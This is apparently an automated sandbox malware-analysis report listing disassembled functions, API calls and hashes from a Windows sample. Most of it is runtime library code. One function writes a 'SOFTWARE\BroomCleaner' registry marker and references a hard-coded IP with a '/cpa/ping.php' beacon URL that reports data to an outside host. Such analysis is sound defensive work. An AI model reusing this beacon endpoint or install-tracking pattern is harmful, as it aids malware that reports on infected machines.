Instruction ID: cda375fd3f1557f7950aedce61f0b08754718638b3ffe0fae8e89dd40b311bc0
Opcode Fuzzy Hash: 26e97803392628a66f226ceeca960576ab6ae59f7b73d64c31b09e82fec4626e
Instruction Fuzzy Hash: D1C1E6B1E04249EFEF11DFA8D880BADBBB4AF49316F085194E451AB391C7B0A941CF65

Uniqueness

Uniqueness Score: -1.00%

Function 04334CB1 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04336F80: GetLastError.KERNEL32(?,?,0432E697,?,?,?,0432ED94,?), ref: 04336F84
Part of subcall function 04336F80: _free.LIBCMT ref: 04336FB7
Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FF8
Part of subcall function 04336F80: _abort.LIBCMT ref: 04336FFE

_memcmp.LIBVCRUNTIME ref: 04334F5B
_free.LIBCMT ref: 04334FCC
_free.LIBCMT ref: 04334FE5
_free.LIBCMT ref: 04335017
_free.LIBCMT ref: 04335020
_free.LIBCMT ref: 0433502C

Strings

C, xrefs: 04334E19

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: cb8600919e0bc0bfd4afc96a1d1b02341e3be43e8f324f1b28cbb9493ad17bb2
Instruction ID: 2f56492f379a3d4b9ca364e90a2dcf3935201dccf7f011af597d484a765537dc
Opcode Fuzzy Hash: cb8600919e0bc0bfd4afc96a1d1b02341e3be43e8f324f1b28cbb9493ad17bb2
Instruction Fuzzy Hash: E3B14875A016199FEB24DF18C884AADB7B4FF58305F1445EAE949A7390E731BE90CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00414A4A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

_memcmp.LIBVCRUNTIME ref: 00414CF4
_free.LIBCMT ref: 00414D65
_free.LIBCMT ref: 00414D7E
_free.LIBCMT ref: 00414DB0
_free.LIBCMT ref: 00414DB9
_free.LIBCMT ref: 00414DC5

Strings

C, xrefs: 00414BB2

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 867fa0ef6cc85311a84fab34ced728f8fa705af9a4dc30a667b1e83018fa5afb
Instruction ID: 4e3572d10ca72b0cc8c55f95b2e81b49ef67830968b65e4bef4c2f16e2eaf972
Opcode Fuzzy Hash: 867fa0ef6cc85311a84fab34ced728f8fa705af9a4dc30a667b1e83018fa5afb
Instruction Fuzzy Hash: 71B11875A012199BDB24DF18D884BEEB7B4FF88314F6045AAE809A7350E735AE91CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0041673F Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
__alloca_probe_16.LIBCMT ref: 004167D1
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
__alloca_probe_16.LIBCMT ref: 004168B6
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
__freea.LIBCMT ref: 00416926

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77

__freea.LIBCMT ref: 0041692F
__freea.LIBCMT ref: 00416954

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
Instruction ID: 26764a85889f0707fbffed2f2a276afb84307330fa482a04e449b3980190c86e
Opcode Fuzzy Hash: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
Instruction Fuzzy Hash: 9C51D4B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFD04D6280DB38DC80C6A8

Uniqueness

Uniqueness Score: -1.00%

Function 0433F16E Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0433F1DD
_free.LIBCMT ref: 0433F1EB
_free.LIBCMT ref: 0433F319
_free.LIBCMT ref: 0433F324

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 16879e562c41d271cc16cff151e7cbd4d44b0ffa200e9325e312bb0433d02818
Instruction ID: c7148852a9ae51168df7ffe4a57718d01e2e35aed11a9927de18e12eff135243
Opcode Fuzzy Hash: 16879e562c41d271cc16cff151e7cbd4d44b0ffa200e9325e312bb0433d02818
Instruction Fuzzy Hash: E461C275D00605EFEB20DFA8C841BAEBBF5EF48721F54516AE954EB241EB30BD418B90

Uniqueness

Uniqueness Score: -1.00%

Function 0041EF07 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041EF76
_free.LIBCMT ref: 0041EF84
_free.LIBCMT ref: 0041F0B2
_free.LIBCMT ref: 0041F0BD

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 7da7e4f938cfb7f53f4ee3042c9ba99eb24c12608d8937e14d039355d897170d
Instruction ID: 68ef0a4baed83bf313a212b59b327df333dc31b97233ae496646a1f671aa2022
Opcode Fuzzy Hash: 7da7e4f938cfb7f53f4ee3042c9ba99eb24c12608d8937e14d039355d897170d
Instruction Fuzzy Hash: 9A61B171900205AFDB20DF65C841BEABBF4EF48710F1441BBED44EB252E734AD868B98

Uniqueness

Uniqueness Score: -1.00%

Function 04335C7A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,043363EF,?,?,?,?,?,?), ref: 04335CBC
__fassign.LIBCMT ref: 04335D37
__fassign.LIBCMT ref: 04335D52
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 04335D78
WriteFile.KERNEL32(?,?,00000000,043363EF,00000000,?,?,?,?,?,?,?,?,?,043363EF,?), ref: 04335D97
WriteFile.KERNEL32(?,?,00000001,043363EF,00000000,?,?,?,?,?,?,?,?,?,043363EF,?), ref: 04335DD0

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: cb6d35f48d1bebdfaee63c5326d5eda48187afe5479d9753ca614cb5bfedeae6
Instruction ID: 89b8f29df8db3c387f8d1fac41e07d671758d54e52d140b7846e3c994cb933e7
Opcode Fuzzy Hash: cb6d35f48d1bebdfaee63c5326d5eda48187afe5479d9753ca614cb5bfedeae6
Instruction Fuzzy Hash: 5751E7B1A10245AFDB10CFA8D885BEEFBF4EF08301F15515AE951F7291D730A551CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00415A13 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
__fassign.LIBCMT ref: 00415AD0
__fassign.LIBCMT ref: 00415AEB
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
Instruction ID: 97884a52693caeb5a5c3a9d5f4bc50bcec63f9a7d6aba0d10f38b6cf3ce1f43d
Opcode Fuzzy Hash: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
Instruction Fuzzy Hash: C051F1B1A05608DFDB10CFA8D881BEEBBF4EF49310F14416BE955E3291D774A981CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040C7B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0040C7DB
___except_validate_context_record.LIBVCRUNTIME ref: 0040C7E3
_ValidateLocalCookies.LIBCMT ref: 0040C871
__IsNonwritableInCurrentImage.LIBCMT ref: 0040C89C
_ValidateLocalCookies.LIBCMT ref: 0040C8F1

Strings

csm, xrefs: 0040C886

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
Instruction ID: 4609d27efc8d7a17fa762f128460d8fd5adcc0840ed3b149ea1d44a8c589526f
Opcode Fuzzy Hash: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
Instruction Fuzzy Hash: 7F418235E00208DBCB10EF69C880A9EBBB5AF45315F14C27BE8156B3D1D7399945CB99

Uniqueness

Uniqueness Score: -1.00%

Function 04321417 Relevance: 10.6, APIs: 7, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0432141C
std::_Lockit::_Lockit.LIBCPMT ref: 0432142E
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0432146B

Part of subcall function 043280E1: _Yarn.LIBCPMT ref: 04328100
Part of subcall function 043280E1: _Yarn.LIBCPMT ref: 04328124

std::bad_exception::bad_exception.LIBCMT ref: 0432148C
__CxxThrowException@8.LIBVCRUNTIME ref: 0432149A
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 043214BD
std::_Lockit::~_Lockit.LIBCPMT ref: 0432152E

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
String ID:
API String ID: 835844855-0
Opcode ID: 7b966b326459ba2342e1ffa8f210576540c6bcc155a50cbc91a1a0f115c5258d
Instruction ID: 359d1f29affcbd99c87b4118f425435e836212ec00854122d5a1c76318717948
Opcode Fuzzy Hash: 7b966b326459ba2342e1ffa8f210576540c6bcc155a50cbc91a1a0f115c5258d
Instruction Fuzzy Hash: 20319072804B10DFD735AF29EA4065AFBF4FF48714B209A2FD09A92A50C774B501CF54

Uniqueness

Uniqueness Score: -1.00%

Function 04346396 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0434639B
RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043CE50,SOFTWARE\BroomCleaner), ref: 043463C3
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,0043CE50,0043CE51,Installed,Installed), ref: 04346446
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 04346467

Strings

SOFTWARE\BroomCleaner, xrefs: 043463A3, 043463B6
Installed, xrefs: 043463A5, 043463D3, 043463F2, 043463F3

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: CloseCreateH_prologValue
String ID: Installed$SOFTWARE\BroomCleaner
API String ID: 1996196666-529226407
Opcode ID: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
Instruction ID: 2bfe8ff45cf63e5627ba9fa48e86e0d7dea26914b4d3f79326f42b0b6e1f63a0
Opcode Fuzzy Hash: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
Instruction Fuzzy Hash: C2318971A00229AEEF148FA8CC909FEBB79FB49618F04516DE402B3251C7716D06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 004228D8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc80b842ec2fa87e1f3d7b13bcdad74e1acd085aed55d4be6a2af7e8e8dba1d6
Instruction ID: eb3437e7256d6e9500263c5b78cb76159e7e032ed684a14598ba9abdd6a69119
Opcode Fuzzy Hash: fc80b842ec2fa87e1f3d7b13bcdad74e1acd085aed55d4be6a2af7e8e8dba1d6
Instruction Fuzzy Hash: 85112BB27081297FDB202F739D04AAF3A5CDF85734B51022EBC15D6241DEBC88818669

Uniqueness

Uniqueness Score: -1.00%

Function 0433F643 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0433F38A: _free.LIBCMT ref: 0433F3B3

_free.LIBCMT ref: 0433F691

Part of subcall function 04336501: HeapFree.KERNEL32(00000000,00000000,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?), ref: 04336517
Part of subcall function 04336501: GetLastError.KERNEL32(?,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?,?), ref: 04336529

_free.LIBCMT ref: 0433F69C
_free.LIBCMT ref: 0433F6A7
_free.LIBCMT ref: 0433F6FB
_free.LIBCMT ref: 0433F706
_free.LIBCMT ref: 0433F711
_free.LIBCMT ref: 0433F71C

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
Instruction ID: 26d7477240f5f064906e2b2dc43558c89f7122401a0ae2c4d8344595ec8fe116
Opcode Fuzzy Hash: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
Instruction Fuzzy Hash: 06112472940B04BAFE30B7B0CC46FCF7B9DAF08757F805825E69966050DA69F5084E51

Uniqueness

Uniqueness Score: -1.00%

Function 0041F3DC Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041F123: _free.LIBCMT ref: 0041F14C

_free.LIBCMT ref: 0041F42A

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041F435
_free.LIBCMT ref: 0041F440
_free.LIBCMT ref: 0041F494
_free.LIBCMT ref: 0041F49F
_free.LIBCMT ref: 0041F4AA
_free.LIBCMT ref: 0041F4B5

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
Instruction ID: 6442e121d4515539895166ad143442a8d84c52f7901faf26133e6203624009ae
Opcode Fuzzy Hash: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
Instruction Fuzzy Hash: 79113D71540B14FADA20BBF2DC07FCB77DCAF4470CF40482EBA9A66052DA7DB9894654

Uniqueness

Uniqueness Score: -1.00%

Function 00404189 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040418E
std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
int.LIBCPMT ref: 004041B4

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 004041BD
std::_Facet_Register.LIBCPMT ref: 004041EE
std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
__CxxThrowException@8.LIBVCRUNTIME ref: 0040422A

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: d30c74e071694a417726272b0ad9aec889f249fd02ec2d8ca2e4928fce66191a
Instruction ID: 0d98e69d0512f29499375b1b223a36d4520ec3994eac90c636b6988e9ad91f04
Opcode Fuzzy Hash: d30c74e071694a417726272b0ad9aec889f249fd02ec2d8ca2e4928fce66191a
Instruction Fuzzy Hash: 7311C472A041249BCB04EBA5DC46AEE7B74EF84358F10457FF911B72D1DB38AA01C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 004033EA Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004033EF
std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
int.LIBCPMT ref: 00403415

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 0040341E
std::_Facet_Register.LIBCPMT ref: 0040344F
std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
__CxxThrowException@8.LIBVCRUNTIME ref: 0040348B

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: d387dd142d687c27f104ba710c4403ca8660f45ee4346cae019e0b35d2893a61
Instruction ID: b08fc69a2d58a520d61ed45628bf7838f6025f71e81aad9ede0327bacf9a49bc
Opcode Fuzzy Hash: d387dd142d687c27f104ba710c4403ca8660f45ee4346cae019e0b35d2893a61
Instruction Fuzzy Hash: 8F11B2329002249BCB05EFA4C845AEE7B74EF84319F10457EF811772D1DB789A00CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004035F5 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004035FA
std::_Lockit::_Lockit.LIBCPMT ref: 00403609
int.LIBCPMT ref: 00403620

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 00403629
std::_Facet_Register.LIBCPMT ref: 0040365A
std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
__CxxThrowException@8.LIBVCRUNTIME ref: 00403696

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 4066e37fb53cc8e902d0eadf6d54435010486020b5249de0d597e5de03c7bd77
Instruction ID: 35ba7fbacb3ba011adbce412d2c2d1e287e189574cae76d7885ddda8e317074f
Opcode Fuzzy Hash: 4066e37fb53cc8e902d0eadf6d54435010486020b5249de0d597e5de03c7bd77
Instruction Fuzzy Hash: 3F11C432A001289BCB14EFA5C845AEE7B74AF84319F10457FF811773D1DB389A04CB99

Uniqueness

Uniqueness Score: -1.00%

Function 043369A6 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,04336BF7,00000001,00000001,?), ref: 04336A00
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,04336BF7,00000001,00000001,?,?,?,?), ref: 04336A86
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 04336B80
__freea.LIBCMT ref: 04336B8D

Part of subcall function 04337CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04337CDE

__freea.LIBCMT ref: 04336B96
__freea.LIBCMT ref: 04336BBB

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 5aa362d34f2587ad585337770af062121dfa53fa41768fff83d20bcf48d2f1bc
Instruction ID: a328a15a0169734116cceb485b0a23e0e3347b05e6dec34b9eb9628cf5678b05
Opcode Fuzzy Hash: 5aa362d34f2587ad585337770af062121dfa53fa41768fff83d20bcf48d2f1bc
Instruction Fuzzy Hash: 4551D1B2600216BFEB358F65CC42EAB77A9EF40765F156268FD04DB140EB34FC408AA0

Uniqueness

Uniqueness Score: -1.00%

Function 04331CDE Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 04331D0A
__cftoe.LIBCMT ref: 04331D3C

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 2ddc8343f9251e146c752777cf7602817e468c0d1f081b9786246e2890976293
Instruction ID: 80bbfc0670132825bdf2be2c4ddef14a0191dffd6db0463923bb3564b0f937bd
Opcode Fuzzy Hash: 2ddc8343f9251e146c752777cf7602817e468c0d1f081b9786246e2890976293
Instruction Fuzzy Hash: 9E510972900605BBEF34AF698C80EBE77A8EF4A327F106219F815D61D1EF31F5018A64

Uniqueness

Uniqueness Score: -1.00%

Function 00411A77 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00411AA3
__cftoe.LIBCMT ref: 00411AD5

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: d20e9699dbc1971cb5a568552f769a18d013c3a1758ac9be0fb612f4fcf7e9e2
Instruction ID: 718bfb1be64fddbb13d287cf5bb67825c1c0e481ba6d94f2ea4f00e94f797b17
Opcode Fuzzy Hash: d20e9699dbc1971cb5a568552f769a18d013c3a1758ac9be0fb612f4fcf7e9e2
Instruction Fuzzy Hash: 5851FB32504205ABDF249B598C41EEF77A9AF49364F10421FF915962A1FB3DE9C0C66C

Uniqueness

Uniqueness Score: -1.00%

Function 0432CC1C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0432CC13,0432A4C2), ref: 0432CC2A
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0432CC38
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0432CC51
SetLastError.KERNEL32(00000000,?,0432CC13,0432A4C2), ref: 0432CCA3

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0582111726bc4582c636df92e8fe045c6ff17bb16724062b7f54ac71f9743851
Instruction ID: ed122083127ee4cf72c7b95943cfa982e389b6859875a75022e7edef77524929
Opcode Fuzzy Hash: 0582111726bc4582c636df92e8fe045c6ff17bb16724062b7f54ac71f9743851
Instruction Fuzzy Hash: 3E01843220A7355EA7682A75BF88AAF3768EF016797203339E624960F0FF5168025588

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9B5 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040C9AC,0040A25B), ref: 0040C9C3
